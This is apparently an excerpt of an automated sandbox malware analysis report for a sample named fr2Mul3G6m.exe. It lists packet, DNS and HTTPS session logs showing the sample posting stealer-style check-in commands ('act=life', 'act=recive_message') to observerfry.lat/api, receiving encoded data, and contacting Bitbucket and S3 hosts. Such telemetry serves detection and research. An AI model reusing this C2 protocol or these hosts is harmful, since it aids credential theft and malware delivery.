                                                                                                                                            Dec 23, 2024 17:20:49.857513905 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:49.863862991 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:49.863904953 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:49.863935947 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:49.863955975 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:49.864017010 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:49.870592117 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:49.870618105 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:49.870691061 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:49.870709896 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:49.870889902 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:49.870973110 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:49.881851912 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:49.881906033 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.022169113 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.022196054 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.022250891 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.022269011 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.022300005 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.022340059 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.028573990 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.028595924 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.028666019 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.028676987 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.028713942 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.029319048 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.030556917 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.034913063 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.034929037 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.034972906 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.034980059 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.035027981 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.035677910 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.041516066 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.041532993 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.041599035 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.041608095 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.048424959 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.048461914 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.048494101 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.048501968 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.048552990 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.052719116 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.054824114 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.054836035 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.054923058 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.054932117 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.054970026 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.055367947 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.061124086 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.061141968 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.061216116 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.061227083 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.089164972 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.089195967 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.089245081 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.121074915 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.213156939 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.213181973 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.213237047 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.213259935 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.213280916 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.213303089 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.213499069 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.219428062 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.219446898 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.219492912 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.219502926 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.219547987 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.225904942 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.225927114 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.226046085 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.226046085 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.226058006 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.232115030 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.232199907 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.232199907 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.232214928 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.232268095 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.232966900 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.233019114 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.233131886 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.233350992 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.238962889 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.238984108 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.239057064 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.239073038 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.239116907 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.245414019 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.245420933 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.245456934 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.245491982 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.245507956 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.245558023 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.251974106 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.251996994 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.252058029 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.252069950 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.253392935 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.253400087 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.293519974 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.305651903 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.329476118 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.403687000 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.403713942 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.403769016 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.403780937 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.403825998 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.403841972 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.409681082 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.409699917 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.409769058 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.409780979 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.415992022 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.416076899 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.416086912 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.416146994 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.416810989 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.416861057 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.417589903 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.422427893 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.422451019 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.422492981 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.422502041 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.422570944 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.423207998 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.423417091 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.423474073 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.451730967 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.497514963 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.645596981 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.645596981 CET49774443192.168.2.103.5.25.145
                                                                                                                                            Dec 23, 2024 17:20:50.645620108 CET443497743.5.25.145192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:50.645627022 CET443497743.5.25.145192.168.2.10

                                                                                                                                            UDP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Dec 23, 2024 17:20:18.867927074 CET6069853192.168.2.101.1.1.1
                                                                                                                                            Dec 23, 2024 17:20:19.096260071 CET53606981.1.1.1192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:42.273921013 CET6544153192.168.2.101.1.1.1
                                                                                                                                            Dec 23, 2024 17:20:42.417062044 CET53654411.1.1.1192.168.2.10
                                                                                                                                            Dec 23, 2024 17:20:44.702299118 CET6539253192.168.2.101.1.1.1
                                                                                                                                            Dec 23, 2024 17:20:44.926142931 CET53653921.1.1.1192.168.2.10

                                                                                                                                            DNS Queries

                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                            Dec 23, 2024 17:20:18.867927074 CET192.168.2.101.1.1.10xc05Standard query (0)observerfry.latA (IP address)IN (0x0001)false
                                                                                                                                            Dec 23, 2024 17:20:42.273921013 CET192.168.2.101.1.1.10xd840Standard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                                                                            Dec 23, 2024 17:20:44.702299118 CET192.168.2.101.1.1.10x75bStandard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false

                                                                                                                                            DNS Answers

                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                            Dec 23, 2024 17:20:19.096260071 CET1.1.1.1192.168.2.100xc05No error (0)observerfry.lat104.21.36.201A (IP address)IN (0x0001)false
                                                                                                                                            Dec 23, 2024 17:20:19.096260071 CET1.1.1.1192.168.2.100xc05No error (0)observerfry.lat172.67.199.72A (IP address)IN (0x0001)false
                                                                                                                                            Dec 23, 2024 17:20:42.417062044 CET1.1.1.1192.168.2.100xd840No error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                                                                            Dec 23, 2024 17:20:42.417062044 CET1.1.1.1192.168.2.100xd840No error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                                                                            Dec 23, 2024 17:20:42.417062044 CET1.1.1.1192.168.2.100xd840No error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                                                                            Dec 23, 2024 17:20:44.926142931 CET1.1.1.1192.168.2.100x75bNo error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Dec 23, 2024 17:20:44.926142931 CET1.1.1.1192.168.2.100x75bNo error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                            Dec 23, 2024 17:20:44.926142931 CET1.1.1.1192.168.2.100x75bNo error (0)s3-w.us-east-1.amazonaws.com3.5.25.145A (IP address)IN (0x0001)false
                                                                                                                                            Dec 23, 2024 17:20:44.926142931 CET1.1.1.1192.168.2.100x75bNo error (0)s3-w.us-east-1.amazonaws.com3.5.11.135A (IP address)IN (0x0001)false
                                                                                                                                            Dec 23, 2024 17:20:44.926142931 CET1.1.1.1192.168.2.100x75bNo error (0)s3-w.us-east-1.amazonaws.com52.216.212.17A (IP address)IN (0x0001)false
                                                                                                                                            Dec 23, 2024 17:20:44.926142931 CET1.1.1.1192.168.2.100x75bNo error (0)s3-w.us-east-1.amazonaws.com52.217.169.129A (IP address)IN (0x0001)false
                                                                                                                                            Dec 23, 2024 17:20:44.926142931 CET1.1.1.1192.168.2.100x75bNo error (0)s3-w.us-east-1.amazonaws.com52.217.169.25A (IP address)IN (0x0001)false
                                                                                                                                            Dec 23, 2024 17:20:44.926142931 CET1.1.1.1192.168.2.100x75bNo error (0)s3-w.us-east-1.amazonaws.com52.217.67.44A (IP address)IN (0x0001)false
                                                                                                                                            Dec 23, 2024 17:20:44.926142931 CET1.1.1.1192.168.2.100x75bNo error (0)s3-w.us-east-1.amazonaws.com54.231.228.73A (IP address)IN (0x0001)false
                                                                                                                                            Dec 23, 2024 17:20:44.926142931 CET1.1.1.1192.168.2.100x75bNo error (0)s3-w.us-east-1.amazonaws.com16.182.100.201A (IP address)IN (0x0001)false

                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                            • observerfry.lat
                                                                                                                                            • bitbucket.org
                                                                                                                                            • bbuseruploads.s3.amazonaws.com

                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            0192.168.2.1049707104.21.36.2014437248C:\Users\user\Desktop\fr2Mul3G6m.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-23 16:20:20 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 8
                                                                                                                                            Host: observerfry.lat
                                                                                                                                            2024-12-23 16:20:20 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                            Data Ascii: act=life
                                                                                                                                            2024-12-23 16:20:21 UTC1129INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 23 Dec 2024 16:20:20 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=flarvihfne3t94uh378gqbb48a; expires=Fri, 18 Apr 2025 10:06:59 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                            vary: accept-encoding
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WLbRrKuKRmt%2F2A%2BLyd7aPudsrN%2FEDBQjcBnnOqlZTbkyopCyEcqLTrygdUEL6dDaNq3o21tY%2FvvrNsWx4wo%2FiblmZSJYlhyzM7BDkD6GK3E9dX8OxgLk2crG5bPUbBeyn%2F8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f69adaccf0a42c0-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1806&min_rtt=1796&rtt_var=681&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1625835&cwnd=212&unsent_bytes=0&cid=3071307e0131e02d&ts=773&x=0"
                                                                                                                                            2024-12-23 16:20:21 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                            Data Ascii: 2ok
                                                                                                                                            2024-12-23 16:20:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            1192.168.2.1049708104.21.36.2014437248C:\Users\user\Desktop\fr2Mul3G6m.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-23 16:20:22 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 53
                                                                                                                                            Host: observerfry.lat
                                                                                                                                            2024-12-23 16:20:22 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                            2024-12-23 16:20:23 UTC1126INHTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 23 Dec 2024 16:20:23 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=ftkqnainohp83jpf0fd5j9rhpl; expires=Fri, 18 Apr 2025 10:07:01 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                            vary: accept-encoding
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MJH9GnWQpbgr5Wh9WUJfyvSQyYWgkh6n75VEfi9Kyqn42V0h1%2Bv%2FkGstWroJEnpfuVF%2BQuHkRUGkL1aJw%2BnsTJVJpkWJvjDoC38rlr6VBFPVCmCguObBtxaixs5tFesaA3E%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f69adb9dc97de95-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3240&min_rtt=1651&rtt_var=1736&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=952&delivery_rate=1768625&cwnd=240&unsent_bytes=0&cid=5e117bbe7749e5ae&ts=860&x=0"
                                                                                                                                            2024-12-23 16:20:23 UTC243INData Raw: 34 39 31 63 0d 0a 45 47 76 56 46 6e 6b 4d 78 6d 4d 2b 33 66 74 32 49 43 56 65 2f 41 53 74 47 74 62 4a 67 51 54 71 47 58 72 49 37 49 2f 78 54 45 4e 72 53 61 4d 30 51 7a 6a 71 51 55 32 34 32 55 78 55 56 79 75 5a 4b 49 39 37 73 75 75 37 59 6f 74 31 43 61 33 41 72 59 63 68 59 53 6f 4e 74 48 6f 4b 61 65 70 42 57 36 58 5a 54 48 74 65 66 4a 6c 71 6a 79 44 30 72 4f 74 6d 69 33 55 59 71 59 66 67 67 53 41 67 65 41 65 79 66 68 78 76 6f 67 4a 53 73 4a 34 54 52 55 51 30 6b 6d 33 41 63 72 76 72 72 53 61 50 59 31 6a 79 7a 73 4b 55 4f 43 4a 64 43 71 5a 39 57 33 48 71 47 42 79 34 6c 56 51 61 42 7a 2b 5a 5a 73 46 38 73 71 4c 70 62 49 4a 39 47 61 79 47 2f 35 67 71 4b 33 67 4a 73 58 38 57 5a 72 59 50 57 4c 65 56 46 55 39 45 66 4e 41 6d 79
                                                                                                                                            Data Ascii: 491cEGvVFnkMxmM+3ft2ICVe/AStGtbJgQTqGXrI7I/xTENrSaM0QzjqQU242UxUVyuZKI97suu7Yot1Ca3ArYchYSoNtHoKaepBW6XZTHtefJlqjyD0rOtmi3UYqYfggSAgeAeyfhxvogJSsJ4TRUQ0km3AcrvrrSaPY1jyzsKUOCJdCqZ9W3HqGBy4lVQaBz+ZZsF8sqLpbIJ9GayG/5gqK3gJsX8WZrYPWLeVFU9EfNAmy
                                                                                                                                            2024-12-23 16:20:23 UTC1369INData Raw: 47 44 30 38 36 4d 31 75 6e 67 4a 75 35 76 67 67 79 68 68 62 55 65 75 4e 42 78 69 35 46 6b 63 74 35 55 61 52 30 51 7a 6d 57 66 50 61 72 75 72 34 47 36 41 66 78 4b 6c 67 65 4b 64 4a 43 5a 36 41 4c 42 37 48 47 61 69 44 6c 2f 2f 31 31 52 46 58 33 7a 47 4a 75 39 6f 74 36 6a 33 61 35 6b 37 42 2b 53 58 72 5a 51 69 59 53 70 4a 73 58 6f 61 59 36 51 54 56 4c 53 53 45 56 42 4d 4e 5a 4e 72 7a 33 57 2b 70 4f 42 6d 6a 33 45 53 70 59 54 70 6e 69 4d 6e 63 67 6e 33 4f 6c 74 70 76 45 45 45 2f 37 6f 52 55 6b 41 77 69 43 54 31 4f 4b 76 6c 2b 69 61 50 64 31 6a 79 7a 75 57 57 4c 53 4a 35 42 72 52 38 45 48 79 6b 45 31 71 79 6e 41 5a 45 51 6a 4b 55 5a 64 31 79 75 71 33 67 62 34 4e 79 48 61 32 4b 72 64 31 75 4a 6d 70 4a 37 7a 51 36 59 36 38 4e 56 71 69 5a 56 46 30 4a 4a 64 35 68
                                                                                                                                            Data Ascii: GD086M1ungJu5vggyhhbUeuNBxi5Fkct5UaR0QzmWfParur4G6AfxKlgeKdJCZ6ALB7HGaiDl//11RFX3zGJu9ot6j3a5k7B+SXrZQiYSpJsXoaY6QTVLSSEVBMNZNrz3W+pOBmj3ESpYTpniMncgn3OltpvEEE/7oRUkAwiCT1OKvl+iaPd1jyzuWWLSJ5BrR8EHykE1qynAZEQjKUZd1yuq3gb4NyHa2Krd1uJmpJ7zQ6Y68NVqiZVF0JJd5h
                                                                                                                                            2024-12-23 16:20:23 UTC1369INData Raw: 33 73 61 34 51 37 56 75 71 4a 39 64 4e 32 59 56 67 4b 6f 33 63 52 4c 4a 45 43 55 72 47 65 41 67 4a 59 63 6f 63 6d 79 48 54 30 38 36 4e 72 69 58 4d 65 75 49 48 67 6b 43 41 76 66 51 79 34 66 42 74 75 71 51 52 59 74 4a 49 58 54 30 4d 75 6c 47 62 48 66 62 57 68 36 53 62 47 4f 78 2b 79 7a 72 58 54 48 7a 5a 35 53 34 4a 33 46 57 43 6a 46 78 79 67 31 77 30 43 51 44 44 65 50 6f 39 31 76 4b 37 6d 61 59 6c 78 46 71 2b 45 34 5a 73 67 49 6d 41 47 73 33 51 58 5a 71 34 4d 55 72 75 52 48 55 6c 4d 4f 70 35 6e 78 54 6a 36 36 2b 52 2b 79 43 4e 59 6e 6f 6e 68 6e 69 46 6a 52 77 71 35 65 68 78 34 35 42 34 53 70 74 6b 54 54 67 64 6b 33 6d 72 47 65 4c 2b 68 35 32 61 50 64 68 32 70 69 65 36 65 4b 53 74 38 44 72 4e 34 45 6d 4f 69 41 56 75 37 6e 41 5a 48 54 6a 43 53 4a 6f 45 34 73
                                                                                                                                            Data Ascii: 3sa4Q7VuqJ9dN2YVgKo3cRLJECUrGeAgJYcocmyHT086NriXMeuIHgkCAvfQy4fBtuqQRYtJIXT0MulGbHfbWh6SbGOx+yzrXTHzZ5S4J3FWCjFxyg1w0CQDDePo91vK7maYlxFq+E4ZsgImAGs3QXZq4MUruRHUlMOp5nxTj66+R+yCNYnonhniFjRwq5ehx45B4SptkTTgdk3mrGeL+h52aPdh2pie6eKSt8DrN4EmOiAVu7nAZHTjCSJoE4s
                                                                                                                                            2024-12-23 16:20:23 UTC1369INData Raw: 52 4f 78 2b 6d 7a 72 58 54 4a 79 68 67 42 37 6c 39 46 6d 69 73 42 6c 4b 79 6b 68 4a 4a 51 44 75 59 61 38 64 31 73 61 6a 69 59 6f 4a 70 47 36 47 45 34 4a 6c 75 62 7a 49 4f 72 7a 52 44 4c 6f 4d 4e 64 61 2b 43 42 6c 51 48 49 39 42 2f 6a 33 2b 34 36 37 73 6d 69 33 51 52 70 59 62 6c 6e 43 45 6c 66 41 2b 78 65 52 35 68 72 68 4e 55 73 5a 51 66 54 55 77 75 6e 6d 76 4c 64 4c 43 6a 36 47 7a 49 4e 56 69 74 6c 71 33 4c 62 68 52 2f 42 72 64 33 44 53 36 37 54 30 58 2f 6e 68 67 43 48 33 79 53 61 4d 39 33 75 4b 66 6f 62 6f 6c 33 46 71 32 4c 35 4a 73 6d 4d 33 4d 4e 76 33 55 56 59 61 55 46 57 62 71 64 45 30 5a 42 4d 39 34 6f 6a 33 2b 73 36 37 73 6d 70 31 77 74 36 4b 2f 58 30 7a 46 76 61 30 6d 77 65 46 73 32 35 41 31 66 73 35 45 62 52 45 34 77 6c 47 2f 45 64 4c 2b 76 37 32
                                                                                                                                            Data Ascii: ROx+mzrXTJyhgB7l9FmisBlKykhJJQDuYa8d1sajiYoJpG6GE4JlubzIOrzRDLoMNda+CBlQHI9B/j3+467smi3QRpYblnCElfA+xeR5hrhNUsZQfTUwunmvLdLCj6GzINVitlq3LbhR/Brd3DS67T0X/nhgCH3ySaM93uKfobol3Fq2L5JsmM3MNv3UVYaUFWbqdE0ZBM94oj3+s67smp1wt6K/X0zFva0mweFs25A1fs5EbRE4wlG/EdL+v72
